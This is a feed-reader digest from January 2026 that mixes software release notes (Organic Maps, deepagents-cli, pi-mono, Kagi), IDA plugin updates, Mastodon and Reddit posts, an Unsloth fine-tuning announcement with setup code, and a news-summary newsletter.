to read (pdf)
- Reconstructing Program Semantics from Go Binaries
- Long time ago, I was looking for game with some hidden rules, browsing random wi... | Hacker News
- Keychron’s Nape Pro turns your mechanical keyboard into a laptop‑style trackball rig: Hands-on at CES 2026 - Yanko Design
- The Code-Only Agent • Rijnard van Tonder
- Agent-native Architectures: How to Build Apps After Code Ends
- January 16, 2026
-
🔗 organicmaps/organicmaps 2026.01.16-8-android release
• NEW: Higher-contrast dark theme colors
• NEW: Google Assistant for navigation and search
• OSM map data as of January 11
• “Auto” navigation theme setting follows the system dark/light mode
• Thinner subway lines
• Search results show capacity for motorcycle parking, bicycle rental, bicycle charging, and car charging
• Show floor level in search results
• Albanian translations and TTS voice guidance
• Updated FAQ and app translations
• Fixed crashes
…more at omaps.org/news. See a detailed announcement on our website when app updates are published in all stores.
You can get automatic app updates from GitHub using Obtainium.
sha256sum:
38bba983100c48d244032a133f95812ea3acb3009f56febe2de727e1033ea3a3 OrganicMaps-26011608-web-release.apk
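If you sideload the APK (for example via Obtainium), it is worth checking it against the published hash before installing. A minimal sketch in Python, assuming the APK is in the current directory; the filename and digest are the ones quoted above:
import hashlib

expected = "38bba983100c48d244032a133f95812ea3acb3009f56febe2de727e1033ea3a3"
with open("OrganicMaps-26011608-web-release.apk", "rb") as f:
    digest = hashlib.sha256(f.read()).hexdigest()
print("OK" if digest == expected else "MISMATCH: " + digest)
-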
🔗 CERTCC/kaiju 260116 release
-
🔗 @cxiao@infosec.exchange seriously though not super happy with this, one reason why chinese cars are mastodon
seriously though not super happy with this, one reason why chinese cars are cheap is because they just ignore labour rights
but this whole thing is such a big sign of how the world has changed
-
🔗 @cxiao@infosec.exchange RE: mastodon
RE: https://flipboard.com/@cbcnews/edmonton-5aq1688az/-/a-bOcz2U73RIe79l8HT2IqJg%3Aa%3A107108217-%2F0
BRACE YOURSELF THE XIAOMI CAR IS COMING
-
🔗 3Blue1Brown (YouTube) The ladybug clock puzzle rss
This is the first in a set of monthly puzzles, curated by Peter Winkler. This one was originally suggested by Richard Stanley.
You can sign up to hear his description of the answer at http://momath.org/mindbenders
-
🔗 orhun/binsider Release v0.3.1 release
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +2 releases rss
sync repo: +1 plugin, +2 releases. New plugins: [DeepExtract](https://github.com/marcosd4h/DeepExtractIDA) (0.0.6, 0.0.5) -
🔗 batrachianai/toad Different diff release
A different approach for diffs
[0.5.33] - 2026-01-16
Fixed
- Fixed character level diff highlights
-
🔗 Locklin on science Conditional probability: an educational defect in Physics didactics rss
Conditional probability is something physicists have a hard time with. There are a number of reasons I know this is true. Primarily I know it is true from my own experience: I had a high-middling to excellent didactics experience in physics, and was basically never exposed to the idea. When I got out into the […]
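For reference (not part of the excerpt itself), the definition and identity the title alludes to, in standard form:
$$P(A \mid B) = \frac{P(A \cap B)}{P(B)} \quad (P(B) > 0), \qquad P(A \mid B) = \frac{P(B \mid A)\,P(A)}{P(B)}.$$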
-
🔗 HexRaysSA/plugin-repository commits Merge pull request #18 from marcosd4h/feature/adding-deepextract-plugin rss
Merge pull request #18 from marcosd4h/feature/adding-deepextract-plugin -
🔗 Hex-Rays Blog Faster, More Responsive Tabular Views in IDA 9.3 rss
-
🔗 langchain-ai/deepagents deepagents-cli==0.0.13a2 release
Initial release
chore: bump deepagents-cli to 0.0.13a2 (#795)
docs: add testing readme (#788)
fix(cli): include tcss and py.typed in package data (#781)
feat(cli): format file tree with markdown (#782)
fix(cli): add explicit package inclusion for setuptools (#780)
add prompt seeding with -m flag (#755)
docs: update model configuration details in README (#772)
fix: import rules (#763)
release(deepagents-cli): 0.0.13a1 (#756)
cli-token-tracking-fixes (#706)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
Add LangSmith tracing status to welcome banner (#741)
feat(cli): inject local context into system prompt via LocalContextMiddleware
fix: don't allow Rich markup from user content (#704)
fix(cli): remove duplicate version from welcome.py (#737)
feat(cli): add --version / /version commands (#698)
minor release(deepagents): bump version to 0.3.5 (#695)
Port SDK Memory to CLI (#691)
fix thread id (#692)
chore(ci): add uv lock checks (#681)
update version bounds (#687)
CLI Refactor to Textual (#686)
Fix invalid YAML in skill-creator SKILL.md frontmatter (#675)
feat(deepagents): add skills to sdk (#591)
docs: replace gemini 1.5 (#653)
feat(cli): show version in splash screen (#610)
chore(cli): expose version (#609)
fix(cli): handle read_file offset exceeding file length by returning all lines (issue #559) (#568)
chore(cli): remove line (#601)
minor version bump, model setting, agent skill spec support, skill creator example (#600)
Comply with Anthropic Agent Skills spec (#592)
feat(cli): add --model flag with auto-detection (#584)
feat: add skill-creator skill with init and validation scripts (#579)
docs(cli): add LangSmith environment variables documentation (#583)
CLI release (#581)
feat(cli): add DEEPAGENTS_LANGSMITH_PROJECT configuration (#577)
feat: add ability to paste images in input (#555)
chore(harbor/cli): allow benchmarking with either cli or SDK (#542)
chore(cli): add comprehensive testing for sandbox operations (#501)
test make format (#483)
Update README to specify CLI (#490)
docs(cli): enhance README with comprehensive documentation (#489)
fix(cli): for now use non peristent implementation of shell (#488)
chore(cli): bump lock file (#487)
chore(cli): add end to end test to the cli (#482)
release(deepagents, cli) (#477)
Harrison/fix diffing (#478)
truncate glob (#473)
fix(cli): 2nd argument must be called runtime (not _runtime) (#472)
add file upload and download apis (#381)
chore(cli): other lints (#464)
feat: add option to disable splash on startup (#446)
chore(cli): pull out interrupt on config (#463)
Harrison/add gemini support (#456)
chore(cli): remove internal file that's not needed (#462)
chore(cli): apply auto-fixes for linting (#461)
chore(cli): quick linting fixes (#460)
chore(cli): remove hard-coded paths (#458)
cli: inherit env variables for cli (#459)
fix(deepagents-cli): fix linting (broke CI) (#457)
feat(cli): add project-level skills support (#439)
fix: localize key bindings and update tips for macOS compatibility (#451)
chore: cleanup markdownlint errors in README.md (#447)
fix cli rendering (#445)
add auto accept option to CLI (#421)
Remove unnecessary dependencies from deepagents module (#429)
fix: use request.override instead of direct attribute overrides (#431)
add missing type annotations (#425)
chore(deepagent-cli): remove double diff display (WIP) (#387)
Add skills and dual-scope memory to deepagents CLI (#315)
use thread id rather than hardcoding to main (#423)
release: deepagents 0.2.9, cli 0.0.9 (#411)
patch: remove resumable shell middleware (#410)
chore(cli): internal refactor and some unit tests for tool descriptions (#394)
Add simple benchmark tests (#395)
fix: remove temperature, not supported by some OpenAI models (o3) (#392)
release 0.0.8 deepagents-cli (#390)
release (#388)
clean up for HIL logic (#384)
chore: finish migration into monorepo structure (#383)
chore: clean up placeholder test file (#378)
feat(sandbox-protocol): introduce id property + restore missing traceback (#379)
chore: add simple integration tests (#377)
chore: carve out integration tests for CLI (#376)
chore: clean up some sandbox provider details (#375)
feat: sandbox protocol (#319)
chore: quick linting pass in cli (#349)
fix(cli): handle multiple concurrent interrupts in HITL workflow (#318)
feat(cli): add fetch_url tool for converting web content to markdown (#310)
ctrl-c protection, add buffer to avoid accidentally exiting thread (#300)
update message.text() to .text (#317)
release 0.2.5 (#306)
fix-cli(ui): show tool call running in spinner instead of hanging cursor (#305)
cli-update: make execute_task async, allows abort to work (#299)
fix (cli-ui): remove brittle/dead code for summarization tracking (#298)
fix (cli-ux): improved diff viewer (highlighting, line_nums, wrapping), fixed spacing nits on tool approval (#293)
ci: enable format lint (#292)
fix (cli): autocomplete for @ and / commands through directories, bash mode in TUI (#278)
chore: delete accidental file (#282)
handle hilt in a way that makes tracing better (#277)
simplify hilt (#276)
chore: add ci (#254)
move agent memory and bump (#249)
Revert "fix(cli): Abort functionality, autocomplete, and fixed memory prompts…" (#248)
fix(cli): Abort functionality, autocomplete, and fixed memory prompts (#246)
cr (#245)
fix(deepagents-cli): package the agent prompt correctly (#242)
release
ix(cli): Fix token counting bugs and improve clarity (#240)
release (#238)
Add deepagents cli scaffolding (#224) -
🔗 r/reverseengineering Drone Hacking Part 1: Dumping Firmware and Bruteforcing ECC rss
submitted by /u/Nightlark192
[link] [comments] -
🔗 badlogic/pi-mono v0.47.0 release
Breaking Changes
- Extensions using Editor directly must now pass TUI as the first constructor argument: new Editor(tui, theme). The tui parameter is available in extension factory functions. (#732)
Added
- OpenAI Codex official support: Full compatibility with OpenAI's Codex CLI models (gpt-5.1, gpt-5.2, gpt-5.1-codex-mini, gpt-5.2-codex). Features include a static system prompt for OpenAI allowlisting, prompt caching via session ID, and reasoning signature retention across turns. Set OPENAI_API_KEY and use --provider openai-codex or select a Codex model. (#737)
- pi-internal:// URL scheme in the read tool for accessing internal documentation. The model can read files from the coding-agent package (README, docs, examples) to learn about extending pi.
- New input event in the extension system for intercepting, transforming, or handling user input before the agent processes it. Supports three result types: continue (pass through), transform (modify text/images), handled (respond without LLM). Handlers chain transforms and short-circuit on handled. (#761 by @nicobailon) (see the sketch after these notes)
- Extension example: input-transform.ts demonstrating input interception patterns (quick mode, instant commands, source routing) (#761 by @nicobailon)
- Custom tool HTML export: extensions with renderCall/renderResult now render in /share and /export output with ANSI-to-HTML color conversion (#702 by @aliou)
- Direct filter shortcuts in Tree mode: Ctrl+D (default), Ctrl+T (no-tools), Ctrl+U (user-only), Ctrl+L (labeled-only), Ctrl+A (all) (#747 by @kaofelix)
Changed
- Skill commands (/skill:name) are now expanded in AgentSession instead of interactive mode. This enables skill commands in RPC and print modes, and allows the input event to intercept /skill:name before expansion.
Fixed
- Editor no longer corrupts terminal display when loading large prompts via setEditorText. Content now scrolls vertically with indicators showing lines above/below the viewport. (#732)
- Piped stdin now works correctly: echo foo | pi is equivalent to pi -p foo. When stdin is piped, print mode is automatically enabled since interactive mode requires a TTY (#708)
- Session tree now preserves branch connectors and indentation when filters hide intermediate entries so descendants attach to the nearest visible ancestor and sibling branches align. Fixed in both TUI and HTML export (#739 by @w-winter)
- Added "upstream connect", "connection refused", and "reset before headers" patterns to auto-retry error detection (#733)
- Multi-line YAML frontmatter in skills and prompt templates now parses correctly. Centralized frontmatter parsing using the yaml library. (#728 by @richardgill)
- ctx.shutdown() now waits for pending UI renders to complete before exiting, ensuring notifications and final output are visible (#756)
- OpenAI Codex provider now retries on transient errors (429, 5xx, connection failures) with exponential backoff (#733)
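The release notes above describe the new input event's semantics (continue / transform / handled, with transforms chaining and handled short-circuiting). As a generic illustration only, not pi's actual extension API, here is how that evaluation order can be expressed in Python:
from dataclasses import dataclass
from typing import Callable, Optional

@dataclass
class Result:
    kind: str                      # "continue" | "transform" | "handled"
    text: Optional[str] = None

Handler = Callable[[str], Result]

def run_input_handlers(text: str, handlers: list[Handler]) -> tuple[str, bool]:
    """Apply handlers in order: transforms chain, 'handled' short-circuits."""
    for handler in handlers:
        result = handler(text)
        if result.kind == "handled":
            return result.text or "", True    # answer directly, skip the LLM
        if result.kind == "transform":
            text = result.text or text        # pass the transformed text onward
        # "continue": leave the text unchanged and keep going
    return text, False                        # hand the (possibly transformed) text to the agent

# Hypothetical handlers for illustration
quick = lambda t: Result("handled", "pong") if t == "ping" else Result("continue")
shout = lambda t: Result("transform", t.upper())
print(run_input_handlers("ping", [quick, shout]))   # ('pong', True)
print(run_input_handlers("hello", [quick, shout]))  # ('HELLO', False)
The point of the short-circuit is that a handler can answer trivial inputs itself (the handled case) without ever invoking the model, while ordinary transforms still compose.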
-
🔗 @cxiao@infosec.exchange really good points here on transnational repression and labour rights too: mastodon
really good points here on transnational repression and labour rights too:
What is the relationship between dissent and protest in China and the security and prosperity of ordinary Americans?
A lot of the things that prompt dissent in China—from widespread labor rights violations to repression of ethnic minority groups—reflect consequences of the CCP systematically restricting rights like free expression and free association. We can already see the influence of this system expanding beyond China’s borders. For example, the CCP manipulates media in other countries and is the world’s worst perpetrator of transnational repression, when governments reach across borders to intimidate or attack exiles they perceive as a threat. Chinese companies import poor labor practices into the foreign countries where they work. This puts pressure on American companies to compete by lowering their labor standards. Thus CCP abuses can undermine people’s rights everywhere, including in the United States.
-
🔗 @cxiao@infosec.exchange RE: mastodon
RE: https://mstdn.social/@davidonformosa/115902246202411668
So many good bits in this interview:
The CDM team races every day to document protest activity on China’s social media sites before it is deleted. Depending on the topic and size of the event—and whether it goes viral—some posts may disappear in minutes.
-
- January 15, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-15 rss
IDA Plugin Updates on 2026-01-15
New Releases:
- dylib_dobby_hook latest
- FeelingLucky v1.0.0
- foo v1.0.0
- HexLens Initial release
- ida-hcli v0.15.10
- ida-hcli v0.15.9
- idawilli v2026.01.15
- panda v1.8.81 @ refs/heads/dev
- sharingan v1.0.2
Activity:
- capa
- 5a5545aa: ghidra: fix unit tests (#2812)
- cpp03
- ee852c76: more function added
- dylib_dobby_hook
- FeelingLucky
- foo
- ghidra
- ghidra-chinese
- HappyIDA
- HexLens
- hrtng
- c743cc03: fix Unflattening loses blocks #47
- ida-domain
- ida-hcli
- idawilli
- MCP-IDA-PRO
- 3ff1d12b: v2.1.0: Standardize API parameter names for LLM compatibility
- msc-thesis-LLMs-to-rank-decompilers
- 004cfecd: edits pre mega-run, changed server to cuda
- panda
- rhabdomancer
- sharingan
- symless
- c0f8029f: Fix missing QRegExpValidator on IDA 9.2 (#49)
-
🔗 HexRaysSA/plugin-repository commits Request for adding DeepExtractIDA plugin rss
Request for adding DeepExtractIDA plugin -
🔗 r/wiesbaden Voi parking ban escalation rss
I actually like using the VOI scooters because they are lighter and have better suspension. But overnight they have activated no-parking zones practically everywhere. Dott and the others can still be parked in all sorts of places.
I have always parked on the unused bicycle parking spot on our property, but that is now also inside the Voi no-parking zone, presumably because it is next to a bus stop.
The picture shows the extent of it.
Does anyone have any idea what is behind this and why they are overdoing it like this?
submitted by /u/Key-Extent5735
[link] [comments] -
🔗 News Minimalist 🐢 NATO sends troops to Greenland + 10 more stories rss
In the last 3 days ChatGPT read 93562 top news stories. After removing previously covered events, there are 11 articles with a significance score over 5.5.

[5.6] Nato allies send troops to Greenland as Denmark calls for common defence — theguardian.com (+487)
Danish Prime Minister Mette Frederiksen declared Greenland’s defense a NATO-wide concern as European troops deploy to the territory following US President Donald Trump’s repeated threats to take the island.
Forces from France, Germany, Norway, and Sweden are arriving in Greenland to bolster security. This follows a contentious Washington meeting where US officials reiterated ambitions to acquire the territory, citing security concerns regarding potential Russian and Chinese influence in the Arctic.
Denmark will establish a permanent military presence alongside rotational NATO personnel. Prime Minister Frederiksen maintains Arctic defense is a collective responsibility, despite President Trump’s claims that Denmark cannot adequately protect the island.
[6.7] Apple partners with Google to enhance Siri with advanced AI — bbc.com (+64)
Apple has partnered with Google to integrate Gemini AI models into Siri and other services, a move marking a significant shift toward outsourcing foundational technology to its primary competitor.
Analysts say the deal brings requested AI features to consumers but highlights Apple's struggle to develop internal alternatives. Apple Intelligence will utilize Google's models while continuing to operate within Apple's private cloud system to ensure user data privacy remains a priority.
[6.7] Vagus nerve stimulator offers lasting relief for treatment-resistant depression — medicine.washu.edu (+8)
A WashU Medicine study found that implanted vagus nerve stimulation devices provide enduring relief for severe treatment-resistant depression, with improvements sustained for at least two years in most responders.
The multicenter RECOVER trial followed nearly 500 participants who previously failed an average of thirteen treatments. Results showed that over 80% of patients who improved after one year maintained those benefits, with 20% of all participants reaching full remission by month 24.
The ongoing study aims to secure federal insurance coverage for the therapy, which is currently cost-prohibitive. The device functions by sending calibrated electrical pulses to the brain via the left vagus nerve.
Highly covered news with significance over 5.5
[6.6] First UK patient receives pioneering CAR-T therapy for aggressive leukaemia — bbc.com (+4)
[6.3] US imposes tariffs on high-performance computer chips, China retaliates — tagesschau.de (German) (+20)
[6.2] China directs domestic firms to cease using US and Israeli cybersecurity software — rfi.fr (Chinese) (+7)
[5.9] Antarctic ice archive preserves climate records from melting glaciers — france24.com (+8)
[5.7] Wikipedia partners with Amazon and Microsoft to monetize content — apnews.com (+25)
[5.7] China's electric vehicle exports surged 104% in 2025 — scmp.com (+6)
[5.7] Ukraine begins first lithium extraction project at Kirovohrad Oblast deposit — rbc.ua (Ukrainian) (+4)
[5.5] OpenAI launches ChatGPT Translate, a new competitor to Google Translate — bleepingcomputer.com (+12)
Thanks for reading!
— Vadim
You can create your own personalized newsletter like this with premium.
-
🔗 r/wiesbaden Tax advisor rss
Hello all. I have been looking for a new tax advisor (since mine retired) for a while without success, as most of them are just not taking new clients. I need help in filing my own personal taxes (a bit complicated/nontraditional so the apps can't handle it) and setting up a new company (need advice on best structure, process, etc).
Does anyone have any tips on tax advisors in town that are open to taking on new clients?
submitted by /u/ExistentialRacoon
[link] [comments] -
🔗 batrachianai/toad Fix for Python REPL release
[0.5.32] - 2026-01-15
Fixed
- Fixed broken text from the input in commands
-
🔗 badlogic/pi-mono v0.46.0 release
Fixed
- Scoped models (--models or enabledModels) now remember the last selected model across sessions instead of always starting with the first model in the scope (#736 by @ogulcancelik)
- Show bun install instead of npm install in update notification when running under Bun (#714 by @dannote)
- /skill prompts now include the skill path (#711 by @jblwilliams)
- Use configurable expandTools keybinding instead of hardcoded Ctrl+O (#717 by @dannote)
- Compaction turn prefix summaries now merge correctly (#738 by @vsabavat)
- Avoid unsigned Gemini 3 tool calls (#741 by @roshanasingh4)
- Fixed signature support for non-Anthropic models in Amazon Bedrock provider (#727 by @unexge)
- Keyboard shortcuts (Ctrl+C, Ctrl+D, etc.) now work on non-Latin keyboard layouts (Russian, Ukrainian, Bulgarian, etc.) in terminals supporting Kitty keyboard protocol with alternate key reporting (#718 by @dannote)
Added
- Edit tool now uses fuzzy matching as fallback when exact match fails, tolerating trailing whitespace, smart quotes, Unicode dashes, and special spaces (#713 by @dannote) (see the sketch after these notes)
- Support APPEND_SYSTEM.md to append instructions to the system prompt (#716 by @tallshort)
- Session picker search: Ctrl+R toggles sorting between fuzzy match (default) and most recent; supports quoted phrase matching and re: regex mode (#731 by @ogulcancelik)
- Export getAgentDir for extensions (#749 by @dannote)
- Show loaded prompt templates on startup (#743 by @tallshort)
- MiniMax China (minimax-cn) provider support (#725 by @tallshort)
- gpt-5.2-codex models for GitHub Copilot and OpenCode Zen providers (#734 by @aadishv)
Changed
- Replaced wasm-vips with @silvia-odwyer/photon-node for image processing (#710 by @can1357)
- Extension example: plan-mode shortcut changed from Shift+P to Ctrl+Alt+P to avoid conflict with typing capital P (#746 by @ferologics)
- UI keybinding hints now respect configured keybindings across components (#724 by @dannote)
- CLI process title is now set to pi for easier process identification (#742 by @richardgill)
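The Edit tool item above ("fuzzy matching as fallback when exact match fails") is easier to see in code. A generic sketch, not pi's implementation; the normalization table is an assumption based only on the changelog wording (smart quotes, Unicode dashes, special spaces, trailing whitespace):
import difflib

_NORMALIZE = str.maketrans({
    "\u2018": "'", "\u2019": "'",   # smart single quotes
    "\u201c": '"', "\u201d": '"',   # smart double quotes
    "\u2013": "-", "\u2014": "-",   # en/em dashes
    "\u00a0": " ",                  # non-breaking space
})

def normalize(line: str) -> str:
    return line.translate(_NORMALIZE).rstrip()

def find_block(haystack: str, needle: str, cutoff: float = 0.9) -> int:
    """Return the starting line index of needle in haystack, or -1."""
    hay = haystack.splitlines()
    ndl = needle.splitlines()
    # 1) try an exact match first
    for i in range(len(hay) - len(ndl) + 1):
        if hay[i:i + len(ndl)] == ndl:
            return i
    # 2) fall back to a tolerant match on normalized text
    norm_ndl = "\n".join(normalize(l) for l in ndl)
    for i in range(len(hay) - len(ndl) + 1):
        window = "\n".join(normalize(l) for l in hay[i:i + len(ndl)])
        if difflib.SequenceMatcher(None, window, norm_ndl).ratio() >= cutoff:
            return i
    return -1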
-
🔗 langchain-ai/deepagents deepagents-cli==0.0.13a1 release
Initial release
release(deepagents-cli): 0.0.13a1 (#756)
cli-token-tracking-fixes (#706)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
Add LangSmith tracing status to welcome banner (#741)
feat(cli): inject local context into system prompt via LocalContextMiddleware
fix: don't allow Rich markup from user content (#704)
fix(cli): remove duplicate version from welcome.py (#737)
feat(cli): add --version / /version commands (#698)
minor release(deepagents): bump version to 0.3.5 (#695)
Port SDK Memory to CLI (#691)
fix thread id (#692)
chore(ci): add uv lock checks (#681)
update version bounds (#687)
CLI Refactor to Textual (#686)
Fix invalid YAML in skill-creator SKILL.md frontmatter (#675)
feat(deepagents): add skills to sdk (#591)
docs: replace gemini 1.5 (#653)
feat(cli): show version in splash screen (#610)
chore(cli): expose version (#609)
fix(cli): handle read_file offset exceeding file length by returning all lines (issue #559) (#568)
chore(cli): remove line (#601)
minor version bump, model setting, agent skill spec support, skill creator example (#600)
Comply with Anthropic Agent Skills spec (#592)
feat(cli): add --model flag with auto-detection (#584)
feat: add skill-creator skill with init and validation scripts (#579)
docs(cli): add LangSmith environment variables documentation (#583)
CLI release (#581)
feat(cli): add DEEPAGENTS_LANGSMITH_PROJECT configuration (#577)
feat: add ability to paste images in input (#555)
chore(harbor/cli): allow benchmarking with either cli or SDK (#542)
chore(cli): add comprehensive testing for sandbox operations (#501)
test make format (#483)
Update README to specify CLI (#490)
docs(cli): enhance README with comprehensive documentation (#489)
fix(cli): for now use non peristent implementation of shell (#488)
chore(cli): bump lock file (#487)
chore(cli): add end to end test to the cli (#482)
release(deepagents, cli) (#477)
Harrison/fix diffing (#478)
truncate glob (#473)
fix(cli): 2nd argument must be called runtime (not _runtime) (#472)
add file upload and download apis (#381)
chore(cli): other lints (#464)
feat: add option to disable splash on startup (#446)
chore(cli): pull out interrupt on config (#463)
Harrison/add gemini support (#456)
chore(cli): remove internal file that's not needed (#462)
chore(cli): apply auto-fixes for linting (#461)
chore(cli): quick linting fixes (#460)
chore(cli): remove hard-coded paths (#458)
cli: inherit env variables for cli (#459)
fix(deepagents-cli): fix linting (broke CI) (#457)
feat(cli): add project-level skills support (#439)
fix: localize key bindings and update tips for macOS compatibility (#451)
chore: cleanup markdownlint errors in README.md (#447)
fix cli rendering (#445)
add auto accept option to CLI (#421)
Remove unnecessary dependencies from deepagents module (#429)
fix: use request.override instead of direct attribute overrides (#431)
add missing type annotations (#425)
chore(deepagent-cli): remove double diff display (WIP) (#387)
Add skills and dual-scope memory to deepagents CLI (#315)
use thread id rather than hardcoding to main (#423)
release: deepagents 0.2.9, cli 0.0.9 (#411)
patch: remove resumable shell middleware (#410)
chore(cli): internal refactor and some unit tests for tool descriptions (#394)
Add simple benchmark tests (#395)
fix: remove temperature, not supported by some OpenAI models (o3) (#392)
release 0.0.8 deepagents-cli (#390)
release (#388)
clean up for HIL logic (#384)
chore: finish migration into monorepo structure (#383)
chore: clean up placeholder test file (#378)
feat(sandbox-protocol): introduce id property + restore missing traceback (#379)
chore: add simple integration tests (#377)
chore: carve out integration tests for CLI (#376)
chore: clean up some sandbox provider details (#375)
feat: sandbox protocol (#319)
chore: quick linting pass in cli (#349)
fix(cli): handle multiple concurrent interrupts in HITL workflow (#318)
feat(cli): add fetch_url tool for converting web content to markdown (#310)
ctrl-c protection, add buffer to avoid accidentally exiting thread (#300)
update message.text() to .text (#317)
release 0.2.5 (#306)
fix-cli(ui): show tool call running in spinner instead of hanging cursor (#305)
cli-update: make execute_task async, allows abort to work (#299)
fix (cli-ui): remove brittle/dead code for summarization tracking (#298)
fix (cli-ux): improved diff viewer (highlighting, line_nums, wrapping), fixed spacing nits on tool approval (#293)
ci: enable format lint (#292)
fix (cli): autocomplete for @ and / commands through directories, bash mode in TUI (#278)
chore: delete accidental file (#282)
handle hilt in a way that makes tracing better (#277)
simplify hilt (#276)
chore: add ci (#254)
move agent memory and bump (#249)
Revert "fix(cli): Abort functionality, autocomplete, and fixed memory prompts…" (#248)
fix(cli): Abort functionality, autocomplete, and fixed memory prompts (#246)
cr (#245)
fix(deepagents-cli): package the agent prompt correctly (#242)
release
ix(cli): Fix token counting bugs and improve clarity (#240)
release (#238)
Add deepagents cli scaffolding (#224) -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release, ~1 changed rss
sync repo: +1 plugin, +1 release, ~1 changed. New plugins: [global-struct-dissector](https://github.com/williballenthin/idawilli) (0.1.0). Changes: [oplog](https://github.com/williballenthin/idawilli) 0.2.0: archive contents changed, download URL changed -
🔗 r/LocalLLaMA 7x Longer Context Reinforcement Learning in Unsloth rss
Hey r/LocalLlama! We're excited to show how Unsloth now enables 7x longer context lengths (up to 12x) for Reinforcement Learning! By using 3 new techniques we developed, we enable you to train gpt-oss 20b QLoRA up to 20K context on a 24 GB card - all with no accuracy degradation. Unsloth GitHub: https://github.com/unslothai/unsloth
- For larger GPUs, Unsloth now trains gpt-oss QLoRA with 380K context on a single 192GB NVIDIA B200 GPU
- Qwen3-8B GRPO reaches 110K context on an 80GB VRAM H100 via vLLM and QLoRA, and 65K for gpt-oss with BF16 LoRA.
- Unsloth GRPO RL runs with Llama, Gemma & all models auto support longer contexts
Also, all features in Unsloth can be combined together and work well together:
- Unsloth's weight-sharing feature with vLLM and our Standby Feature in Memory Efficient RL
- Unsloth's Flex Attention for long context gpt-oss and our 500K Context Training
- Float8 training in FP8 RL and Unsloth's async gradient checkpointing and much more
You can read our educational blogpost for detailed analysis, benchmarks and more: https://unsloth.ai/docs/new/grpo-long-context And you can of course train any model using our new features and kernels via our free fine-tuning notebooks: https://docs.unsloth.ai/get-started/unsloth-notebooks Some free Colab notebooks below which have the 7x longer context support baked in: gpt-oss-20b-GRPO.ipynb (GSPO Colab) | Qwen3-VL-8B-Vision-GRPO.ipynb (Vision RL) | Qwen3-8B (FP8, L4 GPU)
To update Unsloth to automatically make training faster, do:
pip install --upgrade --force-reinstall --no-cache-dir --no-deps unsloth
pip install --upgrade --force-reinstall --no-cache-dir --no-deps unsloth_zoo
And to enable GRPO runs in Unsloth, do:
import os
os.environ["UNSLOTH_VLLM_STANDBY"] = "1" # Standby = extra 30% context lengths!
from unsloth import FastLanguageModel
import torch
max_seq_length = 20000 # Can increase for longer reasoning traces
lora_rank = 32 # Larger rank = smarter, but slower
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "unsloth/Qwen3-4B-Base",
    max_seq_length = max_seq_length,
    load_in_4bit = False, # False for LoRA 16bit
    fast_inference = True, # Enable vLLM fast inference
    max_lora_rank = lora_rank,
)
Hope you all have a great rest of the week and thank you!
submitted by /u/danielhanchen
[link] [comments] -
🔗 langchain-ai/deepagents deepagents==0.3.6 release
Changes since deepagents==0.3.5
chore: add tests for config, context, metadata propagation (#776)
fix: import rules (#763)
fix(deepagents): throw a clear exception message when 'messages' key missing from the output of the subagent (#678)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
fix: no f string needed (#750)
feat: add agent name when creating subagents (#735)
feat(cli): inject local context into system prompt via LocalContextMiddleware
chore: update twitter URL (#727)
chore: CR on docstrings/readme (#722) -
🔗 HexRaysSA/plugin-repository commits sync repo: ~1 changed rss
sync repo: ~1 changed. Changes: [oplog](https://github.com/williballenthin/idawilli) 0.2.0: archive contents changed, download URL changed -
🔗 Kagi release notes Jan 15th, 2026 - New Year tune-up: smoother everything! rss
Kagi Search
Kagi Search Android app
We’ve made meaningful improvements to the Kagi Search app — faster performance, smoother overall experience. If you’re on Android, give the update a try.
We also hope this makes it even easier to share Kagi with the people you care about. Let us know what you think!
- Improved app startup time
- Updated search home screen with native text editing
- Updated home screen widgets with faster access to Translate, Summarize and Assistant
- Add settings to Kagi Search app to autofocus the search bar on launch and to move the search bar to the bottom #9042 @conradsrc
- Improvements/fixes to the Android app screenshots #5019 @Niraj
- Android app: Pressing Enter on a physical keyboard should search #8838 @ItsHarper
- Android app: image, news... etc don't stay selected in the first screen #7207 @Ronzino
- Android Share Menu: "Assistant" option appears twice, first instance should be labeled "Search" #8773 @artemp84
- Image Search With Camera #5032 @Wes
- Add voice search #3270 @Browsing6853
- Launching translate from the Android widget is very slow #8453 @zslayton
- Fixed login for Github connected accounts
Other fixes and improvements
- !word bang now directs to Kagi Translate Dictionary
- Toggle to Disable SlopStop #9105 @______nick (also adds settings around it though)
- While authenticating via privacy pass, you are unable to use any non-default lens #9510 @Sludge
- Trying to change rank status of a domain from Kagi's leaderboard isn't working as expected #9392 @Puddle
- Personalized Results page has Incorrect Link #9517 @catgirlinspace
- The kagi.com/bot page is hard to read #9511 @thekarel
- Maintain 'annual' choice on pricing page when switching between Individual, Family, Team #9378 @keunes
- Translations spill over container in pricing page #9377 @keunes
- Link doesn't resolve to anything #9413 @onlineversioncontrolsystem
- Reverse image search not working correctly with text copied from Excel #8598 @bxd41
- Embed Google Maps Reviews alongside Yelp Reviews #4204 @mackid1993
Kagi Assistant
- We upgraded to GLM 4.7 (with thinking variant)
- Case-agnostic alphabetical sorting for tags #8967 @lolroger
- Make searching on/off more clear
- Special characters like German Umlaut (ä, ö, ü etc.) are broken when customizing Assistant #9501 @Felensis
- The first letter(s) of Grok 4 responses are cut #9484 @4fzx6
- Problem with unicode characters in assistant's output #9345 @chbug
- Kagi Assistant Thread Search Performance degradation (WebKit?) #9462 @tockrock
- Diacritics in filenames prevent document analysis #9361 @noquierouser
- Allow immediate typing when you load the Assistant #9401 @Thibaultmol-kagi
- Research (Experimental) can now generate and edit images
- Model selection window breaks into two lines in CJK languages #9032 @Hanbyeol
- Kagi Assistant: Renaming a thread does not allow you to select single words or characters in the thread name #8909 @__
- Assistant lens dropdown sometimes lights purple with no lens selected #9169 @howie
- Message info now includes timestamp of when the prompt was submitted
Kagi News
- Time Travel mode to access past daily summaries - available to all during beta, subscriber-only after
- Paywall indicator for paywalled domains
- Keyboard shortcuts for navigation do not work as expected @mr-f00
- Wide screen mode @xatier
- Added Estonian as UI language @Tarpsvo
- Heat index graph does not update when refreshing news from notification #9547 @ashemedai
- Allow user to set a universal reading level for category #9531 @cakeboss
- Ordering Sources List in Kagi News #9450 @catfriend
- Links to source articles should be actual links #9273 @r5x
Kagi News Apps (iOS and Android)
- Faster app launch and improved offline support
- Pull-to-refresh added to the feed
- Category settings now include search for easier discovery
